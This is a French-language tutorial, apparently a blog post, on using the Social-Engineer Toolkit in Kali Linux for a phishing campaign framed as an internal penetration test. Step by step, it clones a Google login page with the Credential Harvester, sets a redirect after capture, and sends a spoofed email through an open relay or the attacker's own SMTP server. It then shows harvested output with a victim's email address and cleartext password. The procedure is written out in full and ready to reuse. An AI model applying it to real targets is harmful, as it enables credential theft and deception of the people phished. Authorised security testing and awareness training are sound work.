Setoolkit
SEtoolkit est un Framework de Social-Engineering inclus lors de l’installation de Kali Linux. Il permet de faire bon nombre de choses, ici je vais couvrir un scénario de phishing pour faire du pen-test en interne.
PARTIE 1: La création du Phishing
1.Ouvrir Setoolkit
setoolkit
2. On arrive sur la page d’accueil du programme
3. Choisir (1) Social-Engineering Attacks
4. Choisir (2) Website Attack Vectors
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
99) Return back to the main menu.
5. Choisir (3) Credential Harvester Attack Method
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) HTA Attack Method
99) Return to Main Menu
6. Choisir (1) Web Templates
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
7. Faire Entrée pour valider votre adresse IP
set:webattack> IP address for the POST back in Harvester/Tabnabbing [129.2.32.150]:
8. Choisir (2) Google pour copier la page de login de Google
--------------------------------------------------------
1. Java Required
2. Google
3. Twitter
set:webattack> Select a template:
9. Valider avec Entrée, le programme va nous mettre en ligne la page web à l’adresse web de notre machine
set:webattack> Select a template:2
[*] Cloning the website: http://www.google.com
[*] This could take a little bit...
The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
10. Voici l’IP de ma machine : 129.2.30.150
┌──(kali㉿kalivm)-[~]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:4a:95:4a brd ff:ff:ff:ff:ff:ff
inet 129.2.32.150/16 brd 129.2.255.255 scope global dynamic noprefixroute eth0
valid_lft 1886sec preferred_lft 1886sec
inet6 fe80::20c:29ff:fe4a:954a/64 scope link noprefixroute
valid_lft forever preferred_lft forever
10. Le serveur à été créé avec succès, la page ressemble à ceci
En cas d’erreur de rediction, il faut éditer le fichier /etc/setoolkit/set.config et changer les lignes suivantes :
### This will redirect the harvester victim to this website once executed, rather than the original websi>### For example, if you clone "abcompany.com" and below it says "blahblahcompany.com," it will redirect t>### This is useful if you want to redirect the victim to an additional site after harvester has taken the>### Simply enable harvester redirect, and then enter "http://websiteofyourchoosing.com" in the "HARVESTER>### to change.
HARVESTER_REDIRECT=ON
HARVESTER_URL=http://google.com
#
### This will allow you to specify where the harvester log file goes when you use Apache.
### By default, this will be in the "/var/www" directory.
HARVESTER_LOG=/var/www
PARTIE 2 : La création et l'envoi du mail
1. Ouvrir setoolkit
setoolkit
2. Choisir (5) Mass Mailer Attack
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
99) Return back to the main menu.
3. Choisir (1) E-Mail Attack Single Email Address
Social Engineer Toolkit Mass E-Mailer
There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.
What do you want to do:
1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
99. Return to main menu.
4. Renseigner l’adresse à qui envoyer le mail
set:phishing> Send email to:[email protected]
5. Choisir (2) Use your own server or open relay
1. Use a gmail Account for your email attack.
2. Use your own server or open relay
6. Le programme va ensuite nous demande tout un tas de renseignements, je vais essayer de les expliquer rapidement :
set:phishing> From address (ex: [email protected]):
set:phishing> The FROM NAME the user will see:
set:phishing> Username for open-relay [blank]:
Password for open-relay [blank]:
set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com):
set:phishing> Port number for the SMTP server [25]:
set:phishing> Flag this message/s as high priority? [yes|no]:
Do you want to attach a file - [y/n]: n
Do you want to attach an inline file - [y/n]: n
set:phishing> Email subject:
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:h
[!] IMPORTANT: When finished, type END (all capital) then hit {return} on a new line.
set:phishing> Enter the body of the message, type END (capitals) when finished:
Next line of the body: Message
Next line of the body: END
1 : Adresse qui apparaîtra sur le mail
2 : Nom qui apparaîtra sur le mail
3 : Nom d’utilisateur du serveur SMTP
4 : Mot de passe du serveur SMTP
5 : Adresse du serveur SMTP
6 : Numéro de port du serveur SMTP
7 : Envoie le mail en priorité haute
8 : Envoyer une pièce-jointe
9 : Envoyer une pièce-jointe
10 : Sujet du mail
11 : Envoyer le mail en HTML ou texte
12 : Corps du mail, chaque « Entrée » fait un retour à la ligne, mettre un END pour terminer
13 : Entrer le corps du message et terminer par END
Une fois que tout est rempli, valider avec Entrée et le programme doit vous répondre la chose suivante :
[*] SET has finished sending the emails
Voici à quoi ressemble le mail dans la boite de reception de la victime
PARTIE 3 : Le résultat :
Voila ce qui se passe quand une personne clique sur le lien
La victime ouvre la page, et entre ses informations de connexion
Des que le lien est cliqué, l’adresse IP et des renseignements sur le navigateur Web sont affichés côté serveur, et enregistré dans un fichier.
On peut également voir l’adresse mail et le mot de passe entrés en clair
[*] WE GOT A HIT! Printing the output:
PARAM: GALX=SJLCkfgaqoM
PARAM: continue=https://accounts.google.com/o/oauth2/auth?zt=ChRsWFBwd2JmV1hIcDhtUFdldzBENhIfVWsxSTdNLW9MdThibW1TMFQzVUZFc1BBaURuWmlRSQ%E2%88%99APsBz4gAAAAAUy4_qD7Hbfz38w8kxnaNouLcRiD3YTjX
PARAM: service=lso
PARAM: dsh=-7381887106725792428
PARAM: _utf8=â
PARAM: bgresponse=js_disabled
PARAM: pstMsg=1
PARAM: dnConn=
PARAM: checkConnection=
PARAM: checkedDomains=youtube
POSSIBLE USERNAME FIELD FOUND: [email protected]
POSSIBLE PASSWORD FIELD FOUND: Passwd=superstrongpass
PARAM: signIn=Sign+in
PARAM: PersistentCookie=yes
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
Le résultats sont enregistrés dans ce repertoire :
┌──(root㉿kalivm)-[/home/kali]
└─# ls /root/.set/reports
'2023-01-25 10:21:20.685385.xml' files
Pour aller plus loin, vous pouvez vous rendre sur cette page → Phishing Alerte de sécurité Google